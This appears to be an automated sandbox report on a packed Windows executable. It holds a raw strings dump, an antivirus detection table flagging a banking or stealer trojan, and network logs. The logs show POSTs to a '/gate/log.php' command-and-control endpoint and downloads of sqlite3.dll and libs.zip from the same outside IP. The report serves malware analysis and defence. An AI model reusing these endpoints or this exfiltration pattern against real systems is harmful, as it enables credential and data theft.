2/lUCg/^
V!gl{
9i+-b
c'FtXELfU
L-K5#
vh=~$
)@w>sD$
@|5q
]`:wF
o3ImG
<*h+5u
#i{N3P)X
Gq5we4zxHd
cOA.AI\
ekRup]
;kog6
LxSoe
&~l#z
rOk/$
'[^yn
4ElHc
W_z1V
0y>?'8-
;r(1)
i9PpN
t?v`n`]
z<P=X
ErTN)
E~8-P#|
nA(-9
~,C:
E,4H#
>{IH<
G(;pq8
ylPg2%$
Q._?;
7-g7nn
w3rnT
B1s\}
u$8Eh8Dz
RqyDS
K*?sOP
/,WFC^
t5k&Z0
cdm'H
8ZJ~>
`ST.M
rL`GL>
9 qJue
O/nI9?x
[$Vc~
BHT<M
u[j3TL
Gy^HP
)V*-o[
yE=}(u
N8X=Qo
Qqr=Q
F9k(-
bp{?vB
{/]??
uFjrs
C}ZWQ
ps7Ij
$PmpK
:H_R+u
,Ii4xw
]*PX8.4
^^r56
@HO,,
-;;ge
+~PLiZ
t/'-:
0vvAk
j}$,z
JjQ0xyfm
'@Lfy
d~2%rq
w6o?4
eJ2l&
8+BJ^APZ
z))$K
yjpIB
.xIpD%
"bSXr
ac]O8
:,Siv
3)Fa!>K%(
~iHmq
$+\jB
#yW`t
<0y7y
sO.gj
G'i0l
k~ePvz
&$&D;1GS
O%X/S
HmcM<
(uEwiH
fl*@0
Xq b5
/I<^n
R=n6D"
ej`e9
'nfRO
%#,{iy
)nm.X3
T&Q3E
pHAv*
&;1c*
APtr'
wL#kE
_)u5*?
f u8h
Hu,$Et
ge_.l
2b>l
:3Q$3
5 3y;
4WF[z
T0O|u
0ofEZ
[1o=,U]
5"X.{
IKd{u
$L6&3
Vh`R'
bTa1
J'q'b
@ud5/
[H{z]
VN`rH
h(!0\
t=$kj5
e;05?
NYK'&
>k,hx\
[Lo=|I
UY1i%<
<2t;-
d)`8'_?/
C&zpJW
.7;h{
JZv57`_
RkN1[
oJ6=:
q\z e=
s^86ZW
Pg_e2
zC{ic
s{9imj
_4.ysv
%2s"!
p']Qc
W1\'3/
dsXEA
@#x6w
A{&KT
2+&N(
1ZMco_
zL7:6
O_kwM]
Ee!ik
ZIDvn
4:V s"P
-q3`rI
>nF[O
4#O?+8G
|MnN1Jv
`2^ip
&u|S"
.fXHQ9 0
Fow_2
ayAiu
g'R6W'
%|@(2
J2gDn
[yi)8bv(
=Fnr|
0G2KNi
H%9Sg
j"uX3
yityu
,FBhvo:
gk#36\
}=RL1
yOL#LP
`NkKv
xIl32
z9>I*
MyUD!
-av%)
fYC,PI
{,mF"
cWfo
T(-^1
,gFqw
be|FJ
psX=G
}XLO26
j76z)d
fU4/^
sdKKT
}jKY!g
R,ex2
ybJ-1
GAl%{
_:\|F
4!)AK
bl4rsK_
l)?gm^dODe
ZZdj'
dLmv&sQ
}6KUM
:$Un7
hi$Jg
3&h)ij
_CHeQ
FM7%]M
~*oGYm
<@^x9z
xDwyQ
(hlVNv
|ZjH=Z
({>79n
xAz!-
J&V]Wfq
.86<O
YBk?/>
#!d}:+c{,\
|x;Zl
+Y/ V
"7zDS
a7jXn
:_wQ`
v9P$#
O{v5QCk
?UABl
LT+|A
m8sPqD^
juI)&
DS(Rz
SPt`\61
_9'"`
FSMbGY
>C7Y:4
80I_}H4
N#da+o
| 3bC
C!uT8
KpaPg
U%xztS
lY6ZuM
X7[7d
*05NYI
VwP1m
kI# Qe
k;AKT
"p&eR
QSH/6
PUC[p
e0f6w
@`3HG
1P(MW
SG)MY
g)d.T
6;,"b
b$hf%U
P/85S
Ke/Hw4
}BZrD
[D3qm
NC'"L
dKm#
E5+TP
&7*5XZ
A!Wqvs
f)BB*f'
92YX\
XYQ[w
EA;Bx
<^@O1
&-0ub
wT&%nL%
/[0\,
}RGJg
4EjBx
A?X.rVR
/#0K5
0HY>M
,T|z=%
qi9W;>
dF$"Q
-.*hBj
J1<Un
4{@T1
iAj#Dr
8|.Uxs
N[*\L
"y,C]`
Ojp]b
a4{-C
1H9_x
v|NY2
pc.Y'
NKEte
Bg31z
H/FsP
w]=>7
[:4Vn
=!w*Kt
US9/x
L]0)u
CF\kQ'
'av4[!
OY|%So
"K2|#0=
R9Ek0,
P^:L%
0 a`/D)S
ZlPS|
|6]*A
g1TRh
h?:0;
`4dk>?#
aEVo(N
j},YB
J5n?t
9qJCh
<s41:=T
VP`Rr
cwH-t
Gyb2V
@B3es
p>Q~CPm
z'tKUB
ZTt9v
!%u6C
0Zf}C
l/G=Q
?mrfa
!wWQ3
!I#fL
}"^px4
OAki:na]
Xc'35
_p1Mk
](vr2
Q$JRB
{:gCO.
_YG3|
j'NQu
/x)>W
U%W*'
Ehizc5
,*Xb*
4H'/.-
L[SUN
%VOLe
AYT O
Z)P#o
.ZX>gSj
YQ3,u
MqP_j
WJ:4BH
ox&qs:c
%9uf#
eE"ux
2C&yY9
eTpeI
oyZVk
rb\TA
b`w8s$<
xd-fSH_wjN
,UH1^
Q_RWA
U)~C"
|EmH='
WRUJer
VPY3,
il;o`
6tJM.
1y6o=I>?
dW;_s
jeL']
<w25sS&
wf'L3M-D
OS5Z?
j39{b9
Zhnso p
y1y"Ed
,w0K>-
_uy>H
a#>By
{@:@"
;:q?Y
ymKd
&vVn,
sP1e WM
r:w0&1
k3HKi
d]4$c`lV
nj{=A
>-j<G
JS54|
ESm'?
T%Np%O
m2\3gZ
HVCD
)T^:q
70?="U
$$L!!
d!:rP
cQPl<
}6IYB
}~L_1
Abgd|c
uApJt
:l<`W
UWe^#B`
d~zIGY
2[G%:
dvJ#
d%=nG\\
83 %FV{
/Km;^
MsNa!e
#Lw4B
^APn|(
e<c |
#wL0dC
)#Qy0&z
eO5%/!
O`4F`
4jN$q(n
oSF`#
Y}*5n
yi9 MI
Whilku
{NU-)"
P(een
BzDD`
ft"9O
UgzXz
"c.Ef3
<@!a8
$PFog
LS'{>
3][dI
NbY }
\K[CjiQ
m G_8
LZ2Kxt7Go
\7Ft'
un3U=
db1}iZ
bKNQ4M
9%ps<
Y%P.o
)iFSfkzN
4>|xJ
o _O3:
w;maa9
>}a=aF
<q2~-LD
vE*JW
fo,Oi
'mwbx
`[g!h
rv/vN
~+\C=+
]A6,u
EcgGv
&IgQ`
tQsen
&1BJ3
Rc1E9*
$T)#Z
D0Oaj
ZM'g=4
4^u-D
iARs7I
CDQp2
o|m<~
kzS&sF
BE}4+
>B.y]
2V|RH
(;"o&
AW# GiI
q'ES0MA(vo=
A[KPD
N|ofF[
0!e9
|F x*
6Ry{T
S>7/<
=CC(7
fV!)B
LFCzf;"y
WaLf]
dz|=.
wzbg&
&is39
t_NCu3?(
:)<zY^
3{4:h
W6UwOb
w,'IjpG'
QYQX)
%bL>U}7
cwizp
QWhFee
:Xctc
}EA|V
Ag::v%(
G\i^G
[Q%|&
tvaqd
I}R-f
m|bgS
DyMwNb
[Xyz_
]jIZoq
HOM=fH
$TQcMT
FzkVC
%GpvTj
=\d%&8G
vL|eJ
(~O%W
Bbz}"I
=Xjq|
CU[T4
Co9EN;
`Sbj<
$hbgE
NT\V06
AGsC7
(@L{*R
b:4Ff
'?:j,
K8)yU
>\9qM.j
euAp?M
/j2ht[Bp
FC0U3
O)*Cl
`BTxQB
;{bYvG
'kCI+E
e.m-E
uhzsh
;IF]|
9'ECBC
6(#:O
dLA1wA(7QW
d,[Un
oV0:L
(YS=d
)xU[O*?
WGc7I"
/Rcf{
Za""G(
0MuB9
dl[8k
XAfdu
)lJ,vh>
B)Cu5\
qgnYl
j"4Q2
c*Hgg(
\>"(x)E
rJmU]
mx[^#
C>AT/
;VH*
'mhpK
.4=Z&!
-qESD
eT>!z
}-_i'
L9!T{=
r"Ll1
%owF4
)#rK';
laG[.
t7F%,
[Q2$i2
llGC<9
WMd(&(
s/C{3
bSBGc
>GC|R|
1uIm]
=9{W<
'x]1]
ndcxG
D23Zj
6zb=j_
&s&*9
lsj+U
C,\w')
D]4xJ<
XWuwcQ
:|kg5
cpK6(
0Y)Cb
WDT;;tyy#
6*m?[
Udyoz?
aPqc]G%
pyh"w
YSt!e!OE\
,x,DJ
Dr57b
'#b%R
V:R[A+
{!"S<
-h7I>D
"(Smf
[ic)8
TX-hhy
[EvTU
~~:X&
l#t|d
Y/*,FB
a66vg5`f
[=kd7
AM +PM
_\t$b
v[PYoO
&XFi_
)+Mkn
V2?<b|
<}L2k
k1[nD
.=)6Y
Mv FA
&10P>'
e|z5Z
ssGkp
\rzg_
:0'N/
f$$!r
-lz j
LEJK8W
P0S> r
N_!*`
@*8=~k
dO!Bb
,/^Qv
Q4l;
pbK`g
H0[pk
vWkHg
m8K#(
@|/lwE
IHwt\
Ysw!P
To\cM
F%EO&XK.
ubG $^eIB9
(";Y7
}b1kh
@2KhY
!SH|+f
u);}_}%
~fk&@
Ni{#BB
x.7keZ
m?|k,
ikO(Nf
Ho'h=8FNT?
{X056
JN)p0
['KNP
t,~wd
xiXHzi
L'D+b>
`#TyF
EnX\g'
7a#7w
bfApi
R*Qx?
YWi;+
<R$k#
mp9pQ
WPJZO
/-7vR
k[X3G0
(iNM~r
b9DgV
L^}zl9
fDt_L}
Q":cz
d]G>8,;
rXIAk_
1,Fv"
S5b'\
=y(r_
Yb[Ph
woI>y
<`l6z
~245]`
KoADp
>piL%6
A<AO1
%3veU;{z
HM9?}e
%/vH>x
AGn K&#:
;+>hq
4+6N
gO?e~
UOMNA
$l_U#Q|
q0RN>dV
wT#R"
[nlHV
>u)7r
+v|}h`
D!&"b
Lg"pQ6=%
(g?7s
utgrc
n9h9)
2WCzf
}(2O~
r&sDo#6
#/G=W
S=!v3
tsm;e
g_*[c
6`UfQ
?zT.<
M"v*0
at%Tj{`a
5%g2z
?S!$l
#tdMj
z)$x}
v!Qj%<
]+xwg
e$(wO
'ho(A_c
0(`{"
%<t\WU\
MQVZ6
~UNS`
zsI)aCB
) yZ @/D
?JmHuqc
X[JPv
rg`oM
D4-+^
2Q esVXo
x.pB,|Ljg
r[:Ib5
XS"M.
'#}Dd
?UQSf"
]ZUgR
>S:ql$j
3A1zW
X~U\a#
5,5+{
xlE6n
.5H;{
3g-;?
470m,
@$eO+:
]p1q+
9=CT;
;_w;F
HfKur
Q"#sR]
F`@m6m
j<f]Q
}:Jbk#s'fy(z
Y:At+
qg,C`
>Lli+Y
Vws#w
W*LwAO+^yMn
5`r37
ph+*H
?n~?<
MMt>w
`,i6
L?+`^
|p1NQ
R9rtg#3o
^J&">r
Wxuv4
,j {0k
)nuw0
/"9"Y
r|@)Y-
2|;L4
fIJkn
D$>3E
v\$|k
C]dWRiF
Bh$`T
g}e\S]
_WAseFLR+
@(w+
g <0|c
yoO(]
~ReJ*M6
:hZ{Id$A=6
tcdGQ
+1WTe3*
>j;a:v
SN8=5
PU|TT9Yj
gDPt>
nwy`uZ
g$JEo
|(sxe
[.]EM
@2hRi7
JGqF0
9/CT'W
B!-O:$
!+zZp|
vR-=|
SQO5M
R((kW
TVlD?i;
9b(dm
jc5<z
;-4=Y1
;FMDK
!;qb9
Ci /
]b_9l=
-F3o/
fww'N
[=l.{
5`s#mjn
-y)H.
;VzsX
*6y'{l
*BRx2
a#`t>
e_fm{
&qC^}n
8uy0cV
WiuYb]
, ql^$9
cm'hu"
&B0ex
({t#Ev
k4[07C
>{1[6
<?Usn
,ZJGx=
\GX*a%wl}
R-W +
Vj<$Z
qR2_1Wvc
tJx*l!
!.01CV
j~(XRa5
* 1j1
** ip
'\T3G
x_wuA
?^=M/
DGYy,
2<<^(^
PO:0{
Tjks"G#
_X$%%
+v^]P
4?GAg
x6%R-
h_KAg
aL?'i
;&b!R
u]hTz9
S"KCHP
04ffa
#M;$e
_"0R:
'$!pz
Hfp{5-cc
i[h_:N1
Y5/qn
WroB3
F5;T*v`
*0<7A
:!oPZ!j
[6CuV5
!mC;p
w,D:6:
2G|.qo
Cq6^R
&`.$D
vK;HN9
a*8"w1
'(#'2
&_ MvT
95$~~
Gfu-.7
yKY3J^1
[twq3
^VGt#'
xIKEx
[.M>D
ly9B^
jp#KH
]R'E=W
XN '.
0v})A
Kz_z}
s^Ic
oj4TA&
ys(&p
OCIBW
9=1<n#b
(YO>K
%0)d3
IeEX5j
P$J&Bv
)Pg&X
HQR_]
QLZ)qX
Pf63F
X({YBF
!A'Y<
k4U!^
V?&y{4nx
]x"NY*
nl4:W
Te<GL
C|e:?
}xnK"G
*z! 0g
z*&HZ
xW[=r
2Y\8s{C
-IshX
-S[rCqn?
?m}<=
V[u/m-
j+It=
*vns+n
!x<+eE
}qpH[
YSu ~n
U?P$pa
L`g4:
w6y.'
:{u15
|I3NM
5Yp <
NIwwh
5~ppB
.A-NS
O1H1/5
|$hY2
>HNGk
vs]bkzwaB
R%MC7
Lr?na
/OXDo}
3x*/oEJ3
@!oP7
PLq7W
TN|`kw
(CQ*,
8h'Imtb
Kf}n,:f
3T7nt
>tA3Y12
!e-.l
Qw:ed
b{d'@:eV
;~fqJA
uj| yO
N`9Kf
[+6 Z|
^Nq2Vk
nr}Q"{w
P30bq
gi83BZ
Q0s|W
uC~"@
9p3\j
3`23o
Qe2Gk
D!?B*
PHJpJ7:
$rV'5
7?~B?h
OWC?+W
G'M6ai
sj_JMsl
y?8R}|
7yD1DF2
p3:/V
AjC}5
y"n:6
?{!9S
8RDhi
.]1{:
[phxi
@etm&
Pfm:{
<7mh>
A'OG]
x*da|
QLRLB= m
v`#nT
YT)ai
*aOl^
efo]q6[A
@mXvw
B]HCP
;|*2M
9i;4x
pFm_Zo
)>rA>
]5K%A_
ncl\[
_94d}
i2?I?Mu
2,}xq
#=d1\h
U?Qjs
5:Nh;/
D!'t!jm6
&]2!|
J'j^,0q
4^Ae(e
A[<3{
>xF&I
5?YBSj
esyc(T
8^JTCx
[v-b`.
XKmm^eG
?AR8MX
&.FA*
9/\2?(r
mQ0av
mF16>
-h)<8
=m2}4
5YXZ'
v?,+/
fR+.k
(R(*m{
L`whug%
1'{Y>
L^E7#18
^s5OX
-+^t9
G"Mi3
H{*%bf
xbg;Rf
ky?}fU
&mJ1)C;X
^+.h;
*a7/f
JRc<!W
j`Lt"k
yah?Y
,BZ{=
`MFfS
'M0tZ
gx`9<
:.bdU
)@ $K
U%(BdN
m(z7i
'TPX4n|
|/cjze
Cyg?)
I=h>M
E?#Lx
y2j1E"
=PBfp
TQ}3e
g!Z'N
NnI7I&r$
xjIGWe
x|L1n
sSe3z
Fw2u2j
&<QZ?
Pu aG'~
"o.>&Tc
Zi"8o
,M7oX
f'YG<w
7;fv5
Ra7Vb
f7&2R
-l\c9
;oWf^
+^R'<
05eB<
@_WpK
@Jo[Lk
`c(*;^x.
yYC~^
$K](._Q,
j:Q3X
Aq6M$
%E&/`
"e0}w
"9,bE
OnM*<
kZFYO=\c
IuhY2
k-08j
['AFIJ
z^ucg
w[(-0
v_T|{
T5y/2
C0}AH>&
v>fBI
DPDt&
;p'Sp
x(v<K
u=YQv
DV(~{
w>t~l!
NGji2
w<?Px
~Fc &(
B*%E2
2"jf 7
_=BsQC
W!\@q
tEl!>
=/&F9
SnJ{}[
t34[19
#}aR~tw
^<R:9
i7%z|
dK?FDF
Y}8N8
hRT,oF
@oG`taO
)gw9q
#s>O'
?C[\C
" 7J!
bQJN$
F!P4Z
+/8'v
I;GP$Y
]*K}C
I"MS?A
7K[4F
?5n`'O
!3W>p9
UW$d
}[996
`^Yc[o&|
Dk={C}
q?%LI
71+?D5
j!4;7
*[DC<F
$xRbJ
\p]bF
a'hCYx
,xs9n
G^w"I
R'3;/3
V(l^>
P0uVZn(E
>]dXvuW;
dV{qz
u[(B$
uT4gW
87+4z
u1KY+
XS~1V\
&y#3_
BCvt\w)*
4fZ!w9
v{E7zt
uiEHu
rN3A<
`Vj/F
_&BP3V
A~ZgY
U9Q8Ty
U:xWNN
:_G%a2;
|R!#F>
r!'.g
I>5~%m
gjbXd
g`ch^
{/w)W
:vEt6
LX:?T
U Xl?
7nkTvh
Ni.h4
TWU[d+
;dbeS
E(j})f
I0+zG
+\d7Y
45uyH$
"3[Rt
L=VY0=
I5z'BT
oxlq
wAHr;A
?3j[d
*;_FQE}
Qa:+nF
U':4f
>tIqMp?
D[g1sn
{e~S/aH
y '?a
j}}CF
[vHi?PU
{cAHc?b
\Pzq}
E5J_I
X%GE%ZI
N)ISY
Qa69Ro
]t#+MK
PI==*UP
{k=!d
.hC4<
NStdd
L"-P`
Uro=]
(tONf
U(={g
H`|d;R
udSO,
b7J\)
7FwdC<
uW+2c
;g&&b
d50:wy
M`r)BX
!.p$%.
;@^2w
-IZ77
)bi:Xc
\Gf_]
j1/I9
dj|]<N~
D!SRod'*Z
w]SJ4ff2Y
;/i|K
.O8mE
.tqQ:
u'vmj+
s/,KZ
R`jKZ
])Xhm
Yk]SV
xhM(sR
(.b<Y
G\Cb:
}%`B9t
z|C&a=HoF
gA1k7
/_RBt8J
CN b3
EB( HLn5
ojrY]
'=dgB
WWWWW
u hWnF
PSSSS
SSSSSS
PSSSS
PSSSS
bad allocation
string too long
invalid string position
Unknown exception
!"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~
floor
exp10
log10
(null)
( 8PX
700WP
`h````
xpxxxx
_nextafter
_logb
frexp
_hypot
_cabs
ldexp
atan2
CorExitProcess
runtime error
TLOSS error
SING error
DOMAIN error
R6034
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
R6032
- not enough space for locale information
R6031
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
R6030
- CRT not initialized
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
bad exception
!"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
('8PW
700PP
`h`hhh
xppwpp
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
e+000
GAIsProcessorFeaturePresent
KERNEL32
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
1#QNAN
1#INF
1#IND
1#SNAN
CONOUT$
bad allocation
%s %c
dafevoragitaja menanufasixatupofejasinuxawifuca zuxuwozetozofupajib
RSDS'2<v
C:\nedewas_vewase si.pdb
runtime\crypt\tmp_948602826\bin\wefix.pdb
GetCommandLineW
SetProcessAffinityMask
lstrlenA
GetCurrentProcess
GetUserDefaultLCID
SetComputerNameW
FindNextVolumeMountPointA
FormatMessageA
GetUserDefaultLangID
GetCurrencyFormatW
LoadLibraryW
ReplaceFileW
ReadFile
IsBadStringPtrA
SetConsoleTitleA
WritePrivateProfileStringW
GetLastError
GetProcAddress
GetTapeStatus
GetProcessWorkingSetSize
OpenWaitableTimerW
LocalAlloc
CreateHardLinkW
DebugBreakProcess
GlobalAddAtomW
GetTempPathA
OpenFileMappingA
LocalFree
LCMapStringW
KERNEL32.dll
GetSecurityDescriptorSacl
ADVAPI32.dll
InterlockedIncrement
InterlockedDecrement
Sleep
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
GetCommandLineA
GetStartupInfoA
RaiseException
RtlUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
HeapFree
TerminateProcess
IsDebuggerPresent
HeapAlloc
GetModuleHandleW
ExitProcess
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
HeapCreate
VirtualFree
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
GetLocaleInfoA
GetStringTypeA
MultiByteToWideChar
GetStringTypeW
GetModuleHandleA
LoadLibraryA
InitializeCriticalSectionAndSpinCount
LCMapStringA
GetConsoleCP
GetConsoleMode
FlushFileBuffers
SetFilePointer
CloseHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetStdHandle
CreateFileA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
atan2
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
z?aUY
zc%C1
-64OS
vvvvvvvvvvvvvvvvv
*sssss
,,,,,
sssss*
Nsssss
,,,,,,,,,
sssssN
#####
]###]
nnnnnnnnn
nnnnnnnnnnnnng
|nnnnnnnnnnnnnn
nnnnnnnnn
nnnnnnnnnnnnnnn
nnnnnnP
nnnnnnnnnnnnnnnP
nnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnn
'''''''''''
nnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnng
nnnnnnnnnnnnnn
<<<<<<<<<<
nnnnnnnnnnnnP%
nnnnnnnnnn
nnnnnnnnP%
nnnnnn
nnnnnnnn
nnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnn
gnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
)))))
~~~~~~~~
|YY}|
~br}}
e~z{kz{|
~r|~y
p|{~ue
<)NVAJMM
lgebH*'
ynpxtx94$
zdg]HsHlk]h[TH:Ik~I6$
vb:HaRZaYYE;YEP89Ih,
iaY-YPR:-.::YY8R9
iaY-Y8YYYEDFF[FEI~t,&
x::YYYYY+YZZ;R8+HtI*
xab:IaY8-Y;DFZYEHufB
jba:YaYYRRbRbb-:\wlA
i[aY\b.RRZ;8a;RCk
sb9a:a:YYDR.H:YIe}
rbY:::;F:7HRY:YFe}tP
oYY/6Y.:\0.YHFH[]
t;bY;abaRR7,a;YIp
f9\9YaYR7EYRDY:-H
$&(?JT
ib:::\:YK+8:DYa:v
k::b;b;b9-REYRYHv
}UVR5J>
{~wtdH[cdcIYR:7Y,FYZ9lslT~tDK<
'Amyk/EaaHaa\.:YFHYYRYDZ:;YY7neC<
h;aa2a::bb9FFF+RE8RaHRD
@JX{gaaaHaabY1bEF:YaRYEai~tJ<
fHG;abbbc:Y-:0RYDbt}m)(
vbHaa;baYYFaY-Y]
yhbFbcab::D8Z^|},
<SryhaDFH;EaYF^
f2::Y\:Hw{U3!
lD:FHD
}`)@"
#?O_)<"
>XTBCDLLC'88==
Dhb3TT-TK)N
8ZgP+(I,GG,G,2
!5ZW0
#5Y[H
GGGW)$"
G?=,-(
#8feGJ?
,RA5"
GG,J^N
G<XaT
"9ce]/P
5C_M&#
4.7(2(
8''8&
%A-+*82:@0
^{StS
Zx\uf
jjjjj
w(null)
mscoree.dll
KERNEL32.DLL
((((( H
h(((( H
H
kernel32.dll
bagurokutifecafuwevirodosaxavuc %s %d %f
/ P6pL
,/KPip
/-P?pR
/ P6pL
,/KPip
/-P?pR
/ P6pL
,/KPip
/-P?pR
Dialog Box: Module
MS Sans Serif
VS_VERSION_INFO
StringFileInfo
080405b0
FileVersiones
1.0.5.1
Copright
Copright (C) 2020, kac
VarFileInform
Translations

Full Results

Engine Signature Engine Signature Engine Signature
Bkav HW32.Packed. MicroWorld-eScan Clean CMC Clean
CAT-QuickHeal Clean ALYac Clean Cylance Clean
Zillya Clean SUPERAntiSpyware Clean Sangfor Clean
K7AntiVirus Clean Alibaba Clean K7GW Hacktool ( 700007861 )
Cybereason malicious.54cfb1 Arcabit Clean Invincea heuristic
Baidu Clean F-Prot Clean Symantec ML.Attribute.HighConfidence
TotalDefense Clean APEX Malicious Avast Clean
ClamAV Clean Kaspersky Clean BitDefender Clean
NANO-Antivirus Clean Paloalto Clean AegisLab Clean
Rising Malware.Heuristic!ET#92% (RDMK:cmRtazqmAGYxQLzixYegGNiXrGvE) Ad-Aware Clean TACHYON Clean
Emsisoft Clean Comodo Clean F-Secure Clean
DrWeb Clean VIPRE Clean TrendMicro Clean
Trapmine Clean FireEye Generic.mg.bead5dfd7b20f087 Sophos Clean
Ikarus Trojan-Banker.UrSnif Cyren Clean Jiangmin Clean
Webroot Clean Avira Clean Fortinet Clean
Antiy-AVL Clean Kingsoft Clean Endgame malicious (high confidence)
Microsoft Trojan:Win32/Wacatac.DD!ml ViRobot Clean ZoneAlarm Clean
Avast-Mobile Clean Cynet Malicious (score: 100) AhnLab-V3 Clean
Acronis suspicious McAfee Clean MAX Clean
VBA32 Clean Malwarebytes Clean Zoner Clean
ESET-NOD32 Clean TrendMicro-HouseCall Clean Tencent Clean
Yandex Clean SentinelOne DFI - Malicious PE eGambit Clean
GData Clean BitDefenderTheta Gen:[email protected] AVG Clean
Panda Clean CrowdStrike win/malicious_confidence_80% (D) Qihoo-360 Clean
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 51.145.123.29 [VT] United Kingdom
Y 35.223.217.188 [VT] United States
Y 2.21.7.89 [VT] Europe
N 195.201.225.248 [VT] Germany
Y 104.81.141.127 [VT] Netherlands

TCP

Source Source Port Destination Destination Port
192.168.1.6 49191 104.81.141.127 443
192.168.1.6 49185 13.107.42.23 443
192.168.1.6 49196 195.201.225.248 telete.in 443
192.168.1.6 49180 20.36.252.129 443
192.168.1.6 49197 35.223.217.188 80
192.168.1.6 49198 35.223.217.188 80
192.168.1.6 49207 35.223.217.188 80
192.168.1.6 14199 52.114.76.37 25163
192.168.1.6 63425 52.114.76.37 24232
192.168.1.6 50038 52.114.76.37 47088
192.168.1.6 49205 52.114.76.37 443
192.168.1.6 49206 93.184.220.29 80

UDP

Source Source Port Destination Destination Port
192.168.1.6 137 192.168.1.255 137
192.168.1.6 50764 8.8.8.8 53
192.168.1.6 52555 8.8.8.8 53
192.168.1.6 56304 8.8.8.8 53
192.168.1.6 57593 8.8.8.8 53
192.168.1.6 58697 8.8.8.8 53
192.168.1.6 63241 8.8.8.8 53
192.168.1.6 63713 8.8.8.8 53
192.168.1.6 64201 8.8.8.8 53
192.168.1.6 65048 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
telete.in [VT] A 195.201.225.248 [VT] 195.201.225.248 [VT]

HTTP Requests

URI Data
http://35.223.217.188/gate/log.php
POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 35.223.217.188

http://35.223.217.188/gate/sqlite3.dll
GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.3)
Host: 35.223.217.188
Connection: Keep-Alive

http://35.223.217.188/gate/libs.zip
GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
